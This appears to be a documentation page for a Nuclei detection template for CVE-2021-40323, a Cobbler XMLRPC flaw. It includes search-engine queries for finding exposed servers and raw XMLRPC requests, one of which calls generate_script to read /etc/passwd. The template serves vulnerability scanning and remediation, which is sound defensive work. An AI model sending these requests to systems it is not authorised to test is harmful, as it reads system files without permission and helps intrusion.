Cobbler <3.3.0 - Remote Code Execution
ID: CVE-2021-40323
Severity: critical
Author: c-sh0
Tags: cve,cve2021,cobbler,rce,cobbler_project
Description
Section titled “Description”Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method.
YAML Source
Section titled “YAML Source”id: CVE-2021-40323
info: name: Cobbler <3.3.0 - Remote Code Execution author: c-sh0 severity: critical description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. impact: | Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system. remediation: | Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability. reference: - https://github.com/cobbler/cobbler/releases/tag/v3.3.0 - https://github.com/cobbler/cobbler/issues/2795 - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-40323 - https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-40323 cwe-id: CWE-94 epss-score: 0.03304 epss-percentile: 0.91311 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cobbler_project product: cobbler shodan-query: http.title:"cobbler web interface" fofa-query: title="cobbler web interface" google-query: intitle:"cobbler web interface" tags: cve,cve2021,cobbler,rce,cobbler_project
http: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml
<?xml version='1.0'?> <methodCall> <methodName>find_profile</methodName> <params> <param> <value> <struct> <member> <name>name</name> <value> <string>*</string> </value> </member> </struct> </value> </param> </params> </methodCall> - | POST {{BaseURL}}/cobbler_api HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml
<?xml version='1.0'?> <methodCall> <methodName>generate_script</methodName> <params> <param> <value> <string>{{profile}}</string> </value> </param> <param> <value> <string></string> </value> </param> <param> <value> <string>/etc/passwd</string> </value> </param> </params> </methodCall>
matchers-condition: and matchers: - type: word part: header words: - 'text/xml'
- type: regex regex: - "root:.*:0" - "bin:.*:1" - "nobody:.*:99" condition: or
- type: status status: - 200
extractors: - type: regex name: profile group: 1 regex: - '<value><string>(.*?)</string></value>' internal: true# digest: 4a0a00473045022100b374ecd6f0ee9381c6b24b50c367ac90b3933d411e1672b3d83e2109b4f1ab8702200ce461fedaf6c8f259bfae651d65ae6e2119e336500427b3addde7507d62778f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40323.yaml"